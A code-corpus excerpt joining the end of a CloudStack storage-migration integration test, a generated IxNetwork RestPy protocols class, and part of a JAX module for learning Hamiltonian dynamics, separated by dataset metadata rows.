self.fail("Couldn't enable storage % s" % id)
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
self.fail('Warning: Exception during cleanup : %s' % e)
@attr(tags=['advanced', 'advancedsg', 'basic'], required_hardware='false')
def test_01_cross_cluster_attach_disk(self):
"""
Test Steps:
========
1. Deploy VM in one cluster
2. Migrate to other cluster
3. Add data disk, Attach to VM
4. Disable first storage pool
5. List for migration should not list the first pool anymore
6. Stop VM and detach disk
7. Enable first Pool
8. Migrate root to first pool
9. Now disable first pool again
10. Attach the disk which is running from enabled pool - Should fail
11.Enable pool again
12. Attach disk should now pass
"""
if self.hypervisor.lower() == 'lxc':
self.skipTest("Not running rest of tests in lxc")
cluster_id_list = []
clusters = list_clusters(self.userapiclient, listall='true')
if len(clusters) == 1:
raise unittest.SkipTest('Found only one cluster... skipping test')
for cluster in clusters:
try:
self.debug('Processing for cluster % s ' % cluster.id)
self.list_storage = StoragePool.list(
self.userapiclient, clusterid=cluster.id, scope='CLUSTER')
count_st_pools = len(self.list_storage)
if count_st_pools > 1:
self.debug(
'Found % s storage pools in cluster % s, keeping one and disabling rest' %
(count_st_pools, cluster.id))
for pool in self.list_storage[1:]:
self.disabled_pool_1 = self.list_storage[1]
if pool.state == 'Up':
self.debug(
'Trying to disable storage %s' %
pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
raise e
elif count_st_pools == 1:
self.debug('Only one cluster wide storage found')
else:
self.fail('No cluster wide storage pools found')
except Exception as e:
raise e
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope='ZONE')
if self.list_storage:
for pool in self.list_storage:
if pool.state == 'Up':
self.debug('Trying to disable storage % s' % pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
self.fail("Couldn't disable storage % s" % pool.id)
else:
self.debug('No zone wide storage pools found')
except Exception as e:
raise e
# Step 1: Deploy VM in a cluster
self.virtual_machine_1 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
root_vol = Volume.list(
self.userapiclient,
virtualmachineid=self.virtual_machine_1.id,
type='ROOT')[0]
storage_1 = root_vol.storageid
host_1 = self.virtual_machine_1.hostid
self.debug(
"Step 1: VM1 is running on % s host and % s storage pool" %
(host_1, storage_1))
# Step 2: Live Migrate VM to another cluster
hosts_for_migration = Host.listForMigration(
self.userapiclient, virtualmachineid=self.virtual_machine_1.id)
self.debug(
'Step 2: List of hosts suitable for migration: % s ' %
hosts_for_migration)
host_2 = None
for host in hosts_for_migration:
self.debug(
'Step 2: Host Requires storage motion is % s ' %
host.requiresStorageMotion)
if host.requiresStorageMotion:
host_2 = host.id
if host_2:
self.debug(
'Step 2: Migrating VM % s to Host % s' %
(self.virtual_machine_1.id, host_2))
self.virtual_machine_1.migrate_vm_with_volume(
self.userapiclient, hostid=host_2)
else:
self.fail('Step 2: No host found suitable for migration')
# Step 3: Add data disk and attach to VM
self.volume_1 = Volume.create(self.userapiclient,
services=self.testdata['volume'],
diskofferingid=self.disk_offering.id,
zoneid=self.zone.id)
self.virtual_machine_1.attach_volume(self.userapiclient, self.volume_1)
list_volume = Volume.list(self.userapiclient, id=self.volume_1.id)
self.assertEqual(
list_volume[0].virtualmachineid,
self.virtual_machine_1.id,
'Step 3: Check if volume state (attached) is reflected')
self.debug(
'Step 3: volume id:% s successfully attached to vm id % s' %
(self.volume_1.id, self.virtual_machine_1.id))
root_vol = Volume.list(
self.userapiclient,
virtualmachineid=self.virtual_machine_1.id,
type='ROOT')[0]
storage_2 = root_vol.storageid
data_vol = Volume.list(
self.userapiclient,
virtualmachineid=self.virtual_machine_1.id,
type='DATA')[0]
self.debug(
"Step 3: Data Volume is in storage pool: % s" %
data_vol.storageid)
self.assertEqual(
data_vol.storageid,
root_vol.storageid,
"Step 3: Root and Data disk should be running from 2nd storage pool where the VM was live migrated")
# Step 4: Disable first Storage Pool and verify it is not listed in
# hosts suitable for migration
try:
StoragePool.update(self.userapiclient, id=storage_1, enabled=False)
self.disabled_list.append(storage_1)
self.debug(
'Step 4: Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
self.fail("Step 4: Couldn't disable storage % s" % storage_1)
# Step 5: Disabled pool shouldn't be listed in hostsforMigration since
# all pools in the cluster are disabled
hosts_for_migration = Host.listForMigration(
self.userapiclient, virtualmachineid=self.virtual_machine_1.id)
self.debug(
"Step 5: List of Hosts For Migration is % s" %
hosts_for_migration)
if hosts_for_migration:
for host in hosts_for_migration:
if host_1 == host.id:
self.fail(
"Step 5: All pools in the cluster are disabled, hence host should not be listed for migration")
# Step 6: Stop VM and Detach Disk
self.virtual_machine_1.stop(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Stopped')
verify_vm_storage_pool(self, self.virtual_machine_1.id, storage_2)
self.debug("Step 6: Stopping VM and detaching disk")
self.virtual_machine_1.detach_volume(
self.userapiclient, volume=self.volume_1)
# Step 7, 8: Enable Pool for Migrating VM and disable again
try:
StoragePool.update(self.userapiclient, id=storage_1, enabled=True)
if storage_1 in self.disabled_list:
self.disabled_list.remove(storage_1)
except Exception as e:
self.fail("Step 7: Couldn't enable storage % s" % storage_1)
self.virtual_machine_1.start(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
try:
self.debug(
'Step 8: Migrating VM % s to Host % s' %
(self.virtual_machine_1.id, host_1))
self.virtual_machine_1.migrate_vm_with_volume(
self.userapiclient, hostid=host_1)
except Exception as e:
self.fail(
"Step 8: Couldn't live migrate VM to host % s due to % s" %
(host_1, e))
# Step 9: disable pool again
try:
StoragePool.update(self.userapiclient, id=storage_1, enabled=False)
self.debug("Step 9: Disabling storage pool: % s " % storage_1)
self.disabled_list.append(storage_1)
except Exception as e:
self.fail("Step 9: Couldn't disable storage % s" % storage_1)
st_list = StoragePool.list(self.userapiclient, id=storage_1)
self.debug(
"9.5 Status of storage pool 1 % s is % s " %
(st_list[0].name, st_list[0].state))
# Step 10: Try to attach data disk running from enabled pool with Root
# running in disabled pool - this should fail
with self.assertRaises(Exception):
self.virtual_machine_1.attach_volume(
self.userapiclient, self.volume_1)
self.debug(
"Step 10: Trying to attach volume % s" %
self.volume_1.id)
# Step 11: Enable the pool and try to attach again - this should pass
try:
StoragePool.update(self.userapiclient, id=storage_1, enabled=True)
self.debug("Step 11: Enable storage pool: % s " % storage_1)
self.disabled_list.remove(storage_1)
except Exception as e:
self.fail("Step 11: Couldn't enable storage % s" % storage_1)
# Step 12: Repeat attach volume - should succeed
self.virtual_machine_1.attach_volume(self.userapiclient, self.volume_1)
self.debug("Step 12: Trying to attach volume")
list_volume = Volume.list(self.userapiclient, id=self.volume_1.id)
self.assertEqual(
list_volume[0].virtualmachineid,
self.virtual_machine_1.id,
'Step 12: Check if volume state (attached) is reflected')
self.debug(
'Step 12: volume id:%s successfully attached to vm id%s' %
(self.volume_1.id, self.virtual_machine_1.id))
| 43.682686
| 127
| 0.555778
|
795004fca0e8add873abd4312b26549b1dcabfdd
| 15,471
|
py
|
Python
|
RestPy/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/protocols.py
|
ralfjon/IxNetwork
|
c0c834fbc465af69c12fd6b7cee4628baba7fff1
|
[
"MIT"
] | null | null | null |
RestPy/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/protocols.py
|
ralfjon/IxNetwork
|
c0c834fbc465af69c12fd6b7cee4628baba7fff1
|
[
"MIT"
] | null | null | null |
RestPy/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/protocols.py
|
ralfjon/IxNetwork
|
c0c834fbc465af69c12fd6b7cee4628baba7fff1
|
[
"MIT"
] | null | null | null |
# Copyright 1997 - 2018 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class Protocols(Base):
"""The Protocols class encapsulates a user managed protocols node in the ixnetwork hierarchy.
An instance of the class can be obtained by accessing the Protocols property from a parent instance.
The internal properties list will be empty when the property is accessed and is populated from the server using the find method.
The internal properties list can be managed by the user by using the add and remove methods.
"""
_SDM_NAME = 'protocols'
def __init__(self, parent):
super(Protocols, self).__init__(parent)
@property
def Arp(self):
"""An instance of the Arp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.arp.arp.Arp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.arp.arp import Arp
return Arp(self)
@property
def Bfd(self):
"""An instance of the Bfd class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.bfd.bfd.Bfd)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.bfd.bfd import Bfd
return Bfd(self)._select()
@property
def Bgp(self):
"""An instance of the Bgp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.bgp.bgp.Bgp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.bgp.bgp import Bgp
return Bgp(self)._select()
@property
def Cfm(self):
"""An instance of the Cfm class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.cfm.cfm.Cfm)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.cfm.cfm import Cfm
return Cfm(self)._select()
@property
def Eigrp(self):
"""An instance of the Eigrp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.eigrp.eigrp.Eigrp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.eigrp.eigrp import Eigrp
return Eigrp(self)._select()
@property
def Elmi(self):
"""An instance of the Elmi class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.elmi.elmi.Elmi)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.elmi.elmi import Elmi
return Elmi(self)._select()
@property
def Igmp(self):
"""An instance of the Igmp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.igmp.igmp.Igmp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.igmp.igmp import Igmp
return Igmp(self)._select()
@property
def Isis(self):
"""An instance of the Isis class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.isis.isis.Isis)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.isis.isis import Isis
return Isis(self)._select()
@property
def Lacp(self):
"""An instance of the Lacp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lacp.lacp.Lacp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lacp.lacp import Lacp
return Lacp(self)._select()
@property
def Ldp(self):
"""An instance of the Ldp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ldp.ldp.Ldp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ldp.ldp import Ldp
return Ldp(self)._select()
@property
def LinkOam(self):
"""An instance of the LinkOam class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.linkoam.linkoam.LinkOam)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.linkoam.linkoam import LinkOam
return LinkOam(self)._select()
@property
def Lisp(self):
"""An instance of the Lisp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lisp.lisp.Lisp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lisp.lisp import Lisp
return Lisp(self)._select()
@property
def Mld(self):
"""An instance of the Mld class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.mld.mld.Mld)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.mld.mld import Mld
return Mld(self)._select()
@property
def MplsOam(self):
"""An instance of the MplsOam class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.mplsoam.mplsoam.MplsOam)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.mplsoam.mplsoam import MplsOam
return MplsOam(self)._select()
@property
def MplsTp(self):
"""An instance of the MplsTp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.mplstp.mplstp.MplsTp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.mplstp.mplstp import MplsTp
return MplsTp(self)._select()
@property
def OpenFlow(self):
"""An instance of the OpenFlow class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.openflow.openflow.OpenFlow)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.openflow.openflow import OpenFlow
return OpenFlow(self)._select()
@property
def Ospf(self):
"""An instance of the Ospf class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ospf.ospf.Ospf)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ospf.ospf import Ospf
return Ospf(self)._select()
@property
def OspfV3(self):
"""An instance of the OspfV3 class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ospf.ospfv3.OspfV3)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ospf.ospfv3 import OspfV3
return OspfV3(self)._select()
@property
def Pimsm(self):
"""An instance of the Pimsm class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.pimsm.pimsm.Pimsm)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.pimsm.pimsm import Pimsm
return Pimsm(self)._select()
@property
def Ping(self):
"""An instance of the Ping class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ping.ping.Ping)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ping.ping import Ping
return Ping(self)
@property
def Rip(self):
"""An instance of the Rip class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.rip.rip.Rip)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.rip.rip import Rip
return Rip(self)._select()
@property
def Ripng(self):
"""An instance of the Ripng class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ripng.ripng.Ripng)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ripng.ripng import Ripng
return Ripng(self)._select()
@property
def Rsvp(self):
"""An instance of the Rsvp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.rsvp.rsvp.Rsvp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.rsvp.rsvp import Rsvp
return Rsvp(self)._select()
@property
def Static(self):
"""An instance of the Static class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.static.static.Static)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.static.static import Static
return Static(self)._select()
@property
def Stp(self):
"""An instance of the Stp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.stp.stp.Stp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.stp.stp import Stp
return Stp(self)._select()
@property
def ProtocolMaxNodeCount(self):
"""Shows maximum number of node.
Returns:
number
"""
return self._get_attribute('protocolMaxNodeCount')
def add(self):
"""Adds a new protocols node on the server and retrieves it in this instance.
Returns:
self: This instance with all currently retrieved protocols data using find and the newly added protocols data available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._create(locals())
def remove(self):
"""Deletes all the protocols data in this instance from server.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ProtocolMaxNodeCount=None):
"""Finds and retrieves protocols data from the server.
All named parameters support regex and can be used to selectively retrieve protocols data from the server.
By default the find method takes no parameters and will retrieve all protocols data from the server.
Args:
ProtocolMaxNodeCount (number): Shows maximum number of node.
Returns:
self: This instance with matching protocols data retrieved from the server available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._select(locals())
def read(self, href):
"""Retrieves a single instance of protocols data from the server.
Args:
href (str): An href to the instance to be retrieved
Returns:
self: This instance with the protocols data from the server available through an iterator or index
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
| 34.45657
| 152
| 0.753927
|
795006074c393a90f382bb58a702e55db96ff292
| 17,303
|
py
|
Python
|
experiments/trainer/hamiltonian_dynamics.py
|
felipeescallon/equivariant-MLP
|
1542fcbb747292ae1c529d551595d919087c617d
|
[
"MIT"
] | 1
|
2021-07-06T21:07:57.000Z
|
2021-07-06T21:07:57.000Z
|
experiments/trainer/hamiltonian_dynamics.py
|
felipeescallon/equivariant-MLP
|
1542fcbb747292ae1c529d551595d919087c617d
|
[
"MIT"
] | null | null | null |
experiments/trainer/hamiltonian_dynamics.py
|
felipeescallon/equivariant-MLP
|
1542fcbb747292ae1c529d551595d919087c617d
|
[
"MIT"
] | null | null | null |
import jax.numpy as jnp
from jax import grad, jit, vmap, jacfwd, jvp, vjp
from jax import random
import numpy as np
import jax.numpy as jnp
from jax.experimental.ode import odeint
from torch.utils.data import Dataset
from emlp.groups import SO2eR3,O2eR3,DkeR3,Trivial
from emlp.reps import T,Scalar
from oil.utils.utils import Named
from oil.tuning.configGenerator import flatten_dict
import os
import torch
import torch
import torch.nn as nn
from oil.utils.utils import export
import jax
from jax import vmap
import jax.numpy as jnp
import numpy as np
import objax
from .classifier import Regressor,Classifier
#from emlp_jax.model_trainer import RegressorPlus
from functools import partial
from itertools import islice
def unpack(z):
D = jnp.shape(z)[-1]
assert D % 2 == 0
d = D//2
q, p_or_v = z[..., :d], z[..., d:]
return q, p_or_v
def pack(q, p_or_v):
return jnp.concatenate([q, p_or_v], axis=-1)
def symplectic_form(z):
q, p = unpack(z)
return pack(p, -q)
def hamiltonian_dynamics(hamiltonian, z,t):
grad_h = grad(hamiltonian)
gh = grad_h(z)
return symplectic_form(gh)
def HamiltonianFlow(H,z0,T):
dynamics = lambda z,t: hamiltonian_dynamics(H,z,t)
return odeint(dynamics, z0, T, rtol=1e-4, atol=1e-4)#.transpose((1,0,2))
def BHamiltonianFlow(H,z0,T,tol=1e-4):
dynamics = jit(vmap(jit(partial(hamiltonian_dynamics,H)),(0,None)))
return odeint(dynamics, z0, T, rtol=tol).transpose((1,0,2))
def BOdeFlow(dynamics,z0,T,tol=1e-4):
dynamics = jit(vmap(jit(dynamics),(0,None)))
return odeint(dynamics, z0, T, rtol=tol).transpose((1,0,2))
#BHamiltonianFlow = jit(vmap(HamiltonianFlow,(None,0,None)),static_argnums=(0,))
class HamiltonianDataset(Dataset):
def __init__(self,n_systems=100,chunk_len=5,dt=0.2,integration_time=30,regen=False):
super().__init__()
root_dir = os.path.expanduser(f"~/datasets/ODEDynamics/{self.__class__}/")
filename = os.path.join(root_dir, f"trajectories_{n_systems}_{chunk_len}_{dt}_{integration_time}.pz")
if os.path.exists(filename) and not regen:
Zs = torch.load(filename)
else:
zs = self.generate_trajectory_data(n_systems, dt, integration_time)
Zs = np.asarray(self.chunk_training_data(zs, chunk_len))
os.makedirs(root_dir, exist_ok=True)
torch.save(Zs, filename)
self.Zs = Zs
self.T = np.asarray(jnp.arange(0, chunk_len*dt, dt))
self.T_long = np.asarray(jnp.arange(0,integration_time,dt))
def __len__(self):
return self.Zs.shape[0]
def __getitem__(self, i):
return (self.Zs[i, 0], self.T), self.Zs[i]
def integrate(self,z0s,ts):
return HamiltonianFlow(self.H,z0s, ts)
def generate_trajectory_data(self, n_systems, dt, integration_time, bs=100):
""" Returns ts: (n_systems, traj_len) zs: (n_systems, traj_len, z_dim) """
n_gen = 0; bs = min(bs, n_systems)
t_batches, z_batches = [], []
while n_gen < n_systems:
z0s = self.sample_initial_conditions(bs)
ts = jnp.arange(0, integration_time, dt)
new_zs = BHamiltonianFlow(self.H,z0s, ts)
z_batches.append(new_zs)
n_gen += bs
zs = jnp.concatenate(z_batches, axis=0)[:n_systems]
return zs
def chunk_training_data(self, zs, chunk_len):
batch_size, traj_len, *z_dim = zs.shape
n_chunks = traj_len // chunk_len
chunk_idx = np.random.randint(0, n_chunks, (batch_size,))
chunked_zs = np.stack(np.split(zs,n_chunks, axis=1))
chosen_zs = chunked_zs[chunk_idx, np.arange(batch_size)]
return chosen_zs
def H(self,z):
raise NotImplementedError
def sample_initial_conditions(self,bs):
raise NotImplementedError
def animate(self, zt=None):
if zt is None:
zt = np.asarray(self.integrate(self.sample_initial_conditions(10)[0],self.T_long))
# bs, T, 2nd
if len(zt.shape) == 3:
j = np.random.randint(zt.shape[0])
zt = zt[j]
xt,pt = unpack(zt)
xt = xt.reshape((xt.shape[0],-1,3))
anim = self.animator(xt)
return anim.animate()
class SHO(HamiltonianDataset):
def H(self,z):
ke = (z[...,1]**2).sum()/2
pe = (z[...,0]**2).sum()/2
return ke+pe
def sample_initial_conditions(self,bs):
return np.random.randn(bs,2)
class DoubleSpringPendulum(HamiltonianDataset):
def __init__(self,*args,**kwargs):
super().__init__(*args,**kwargs)
self.rep_in = 4*T(1)#Vector
self.rep_out = T(0)#Scalar
self.symmetry = O2eR3()
self.stats = (0,1,0,1)
def H(self,z):
g=1
m1,m2,k1,k2,l1,l2 = 1,1,1,1,1,1
x,p = unpack(z)
p1,p2 = unpack(p)
x1,x2 = unpack(x)
ke = .5*(p1**2).sum(-1)/m1 + .5*(p2**2).sum(-1)/m2
pe = .5*k1*(jnp.sqrt((x1**2).sum(-1))-l1)**2
pe += k2*(jnp.sqrt(((x1-x2)**2).sum(-1))-l2)**2
pe += m1*g*x1[...,2]+m2*g*x2[...,2]
return (ke + pe).sum()
def sample_initial_conditions(self,bs):
x1 = np.array([0,0,-1.5]) +.2*np.random.randn(bs,3)
x2= np.array([0,0,-3.]) +.2*np.random.randn(bs,3)
p = .4*np.random.randn(bs,6)
z0 = np.concatenate([x1,x2,p],axis=-1)
return z0
@property
def animator(self):
return CoupledPendulumAnimation
class IntegratedDynamicsTrainer(Regressor):
def __init__(self,model,*args,**kwargs):
super().__init__(model,*args,**kwargs)
self.loss = objax.Jit(self.loss,model.vars())
#self.model = objax.Jit(self.model)
self.gradvals = objax.Jit(objax.GradValues(self.loss,model.vars()))#objax.Jit(objax.GradValues(fastloss,model.vars()),model.vars())
#self.model.predict = objax.Jit(objax.ForceArgs(model.__call__,training=False),model.vars())
def loss(self, minibatch):
""" Standard cross-entropy loss """
(z0, ts), true_zs = minibatch
pred_zs = BHamiltonianFlow(self.model,z0,ts[0])
return jnp.mean((pred_zs - true_zs)**2)
def metrics(self, loader):
mse = lambda mb: np.asarray(self.loss(mb))
return {"MSE": self.evalAverageMetrics(loader, mse)}
def logStuff(self, step, minibatch=None):
loader = self.dataloaders['test']
metrics = {'test_Rollout': np.exp(self.evalAverageMetrics(loader,partial(log_rollout_error,loader.dataset,self.model)))}
self.logger.add_scalars('metrics', metrics, step)
super().logStuff(step,minibatch)
class IntegratedODETrainer(Regressor):
def __init__(self,model,*args,**kwargs):
super().__init__(model,*args,**kwargs)
self.loss = objax.Jit(self.loss,model.vars())
#self.model = objax.Jit(self.model)
self.gradvals = objax.Jit(objax.GradValues(self.loss,model.vars()))#objax.Jit(objax.GradValues(fastloss,model.vars()),model.vars())
#self.model.predict = objax.Jit(objax.ForceArgs(model.__call__,training=False),model.vars())
def loss(self, minibatch):
""" Standard cross-entropy loss """
(z0, ts), true_zs = minibatch
pred_zs = BOdeFlow(self.model,z0,ts[0])
return jnp.mean((pred_zs - true_zs)**2)
def metrics(self, loader):
mse = lambda mb: np.asarray(self.loss(mb))
return {"MSE": self.evalAverageMetrics(loader, mse)}
def logStuff(self, step, minibatch=None):
loader = self.dataloaders['test']
metrics = {'test_Rollout': np.exp(self.evalAverageMetrics(loader,partial(log_rollout_error_ode,loader.dataset,self.model)))}
self.logger.add_scalars('metrics', metrics, step)
super().logStuff(step,minibatch)
def rel_err(a,b):
return jnp.sqrt(((a-b)**2).mean())/(jnp.sqrt((a**2).mean())+jnp.sqrt((b**2).mean()))#
def log_rollout_error(ds,model,minibatch):
(z0, _), _ = minibatch
pred_zs = BHamiltonianFlow(model,z0,ds.T_long)
gt_zs = BHamiltonianFlow(ds.H,z0,ds.T_long)
errs = vmap(vmap(rel_err))(pred_zs,gt_zs) # (bs,T,)
clamped_errs = jax.lax.clamp(1e-7,errs,np.inf)
log_geo_mean = jnp.log(clamped_errs).mean()
return log_geo_mean
def pred_and_gt(ds,model,minibatch):
(z0, _), _ = minibatch
pred_zs = BHamiltonianFlow(model,z0,ds.T_long,tol=2e-6)
gt_zs = BHamiltonianFlow(ds.H,z0,ds.T_long,tol=2e-6)
return np.stack([pred_zs,gt_zs],axis=-1)
def log_rollout_error_ode(ds,model,minibatch):
(z0, _), _ = minibatch
pred_zs = BOdeFlow(model,z0,ds.T_long)
gt_zs = BHamiltonianFlow(ds.H,z0,ds.T_long)
errs = vmap(vmap(rel_err))(pred_zs,gt_zs) # (bs,T,)
clamped_errs = jax.lax.clamp(1e-7,errs,np.inf)
log_geo_mean = jnp.log(clamped_errs).mean()
return log_geo_mean
def pred_and_gt_ode(ds,model,minibatch):
(z0, _), _ = minibatch
pred_zs = BOdeFlow(model,z0,ds.T_long,tol=2e-6)
gt_zs = BHamiltonianFlow(ds.H,z0,ds.T_long,tol=2e-6)
return np.stack([pred_zs,gt_zs],axis=-1)
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.animation as animation
import numpy as np
class Animation(object):
def __init__(self, qt,lims=None,traj_lw=1,figkwargs={}):
""" [qt (T,n,d)"""
self.qt = qt
T,n,d = qt.shape
assert d in (2,3), "too many dimensions for animation"
self.fig = plt.figure(**figkwargs)
